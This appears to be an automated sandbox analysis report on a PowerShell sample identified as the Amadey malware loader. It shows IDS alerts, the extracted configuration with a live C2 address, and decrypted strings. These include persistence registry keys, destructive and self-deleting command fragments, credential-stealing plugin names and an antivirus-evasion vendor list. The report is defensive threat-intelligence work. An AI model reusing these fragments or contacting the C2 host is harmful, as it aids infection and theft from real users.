2025-01-20T14:37:14.763448+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50129	92.255.85.34	80	TCP
2025-01-20T14:37:19.304129+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50133	92.255.85.34	80	TCP
2025-01-20T14:37:23.852856+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50148	92.255.85.34	80	TCP
2025-01-20T14:37:28.414517+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50171	92.255.85.34	80	TCP
2025-01-20T14:37:33.305101+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50182	92.255.85.34	80	TCP
2025-01-20T14:37:37.889128+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50190	92.255.85.34	80	TCP
2025-01-20T14:37:42.485453+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50193	92.255.85.34	80	TCP
2025-01-20T14:37:47.036912+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50195	92.255.85.34	80	TCP
2025-01-20T14:37:51.828364+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50199	92.255.85.34	80	TCP
2025-01-20T14:37:56.423339+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50208	92.255.85.34	80	TCP
2025-01-20T14:38:01.085941+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50221	92.255.85.34	80	TCP
2025-01-20T14:38:05.699427+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50228	92.255.85.34	80	TCP
2025-01-20T14:38:10.369271+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50248	92.255.85.34	80	TCP
2025-01-20T14:38:15.124081+0100	2856097	1	A Network Trojan was detected	192.168.2.8	50272	92.255.85.34	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Amadey {"C2 url": "92.255.85.34/i2Fe32Z13/index.php", "Version": "5.18", "Install Folder": "dcd8893974", "Install File": "Gxtuum.exe"}

Multi AV Scanner detection for submitted file

Source: qOH6oNqqoi.ps1

Virustotal: Detection: 18%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 92.255.85.34
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: /i2Fe32Z13/index.php
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: dcd8893974
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Gxtuum.exe
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: http://
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: https://
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ------
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: random
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Keyboard Layout\Preload
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 00000419
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 00000422
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 00000423
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 0000043f
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: https://
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ------
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: random
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 00000422
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 00000423
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 0000043f
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 00000419
Source: 00000003.00000002.3922282437.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: http://

Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:50116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50156 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.8:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:50164 version: TLS 1.2

Source:	Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000022.00000003.3141676339.0000026F3D04B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1505236184.000001F062AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1547298139.000001F079ED0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1505236184.000001F061B47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2447416420.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2447416420.0000000004C8C000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0043F0C1 FindFirstFileExW,

3_2_0043F0C1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49715 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49714 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49727 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49713 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49706 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49705 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49707 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49710 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49719 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49725 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49704 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49712 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49712 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49717 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49721 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49736 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49729 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49744 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49718 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49711 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49728 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49723 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49756 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49787 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49819 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49850 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49730 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49837 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49913 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49722 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49734 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49978 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49994 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49735 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49930 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50009 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49720 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50023 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49771 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49716 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49962 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50025 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49724 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50033 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50028 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50026 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50047 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 92.255.85.34:56001 -> 192.168.2.8:50029
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50051 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50055 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50067 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50058 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50088 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50030 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50092 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50074 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49805 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50099 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50095 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50115 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50105 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50120 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50024 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50125 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:49946 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50129 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50133 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50103 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50136 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50057 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50148 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50027 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50171 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50127 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 92.255.85.34:56001 -> 192.168.2.8:49925
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:49733 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50174 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50189 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.8:50192 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50193 -> 92.255.85.34:80
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.8:50190 -> 92.255.85.34:80
